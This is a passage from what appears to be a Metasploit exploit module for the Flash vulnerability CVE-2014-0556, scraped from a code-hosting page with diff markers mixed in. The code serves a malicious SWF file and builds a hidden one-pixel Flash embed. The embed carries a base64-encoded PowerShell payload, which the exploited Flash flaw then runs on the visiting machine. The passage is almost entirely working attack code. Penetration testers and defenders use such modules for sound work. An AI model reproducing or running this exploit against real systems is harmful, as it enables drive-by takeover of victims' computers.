print_status('Sending SWF...')
|
||||
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
|
||||
return
|
||||
end
|
||||
|
||||
print_status('Sending HTML...')
|
||||
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
|
||||
end
|
||||
|
||||
def exploit_template(cli, target_info)
|
||||
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
|
||||
target_payload = get_payload(cli, target_info)
|
||||
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
|
||||
b64_payload = Rex::Text.encode_base64(psh_payload)
|
||||
|
||||
html_template = %Q|<html>
|
||||
<body>
|
||||
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
|
||||
<param name="movie" value="<%=swf_random%>" />
|
||||
<param name="allowScriptAccess" value="always" />
|
||||
<param name="FlashVars" value="sh=<%=b64_payload%>" />
|
||||
<param name="Play" value="true" />
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
|
||||
</object>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
||||
return html_template, binding()
|
||||
end
|
||||
|
||||
def create_swf
|
||||
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0556', 'msf.swf')
|
||||
swf = ::File.open(path, 'rb') { |f| swf = f.read }
|
||||
|
||||
swf
|
||||
end
|
||||
|
||||
end
|
Loading…
Add table
Reference in a new issue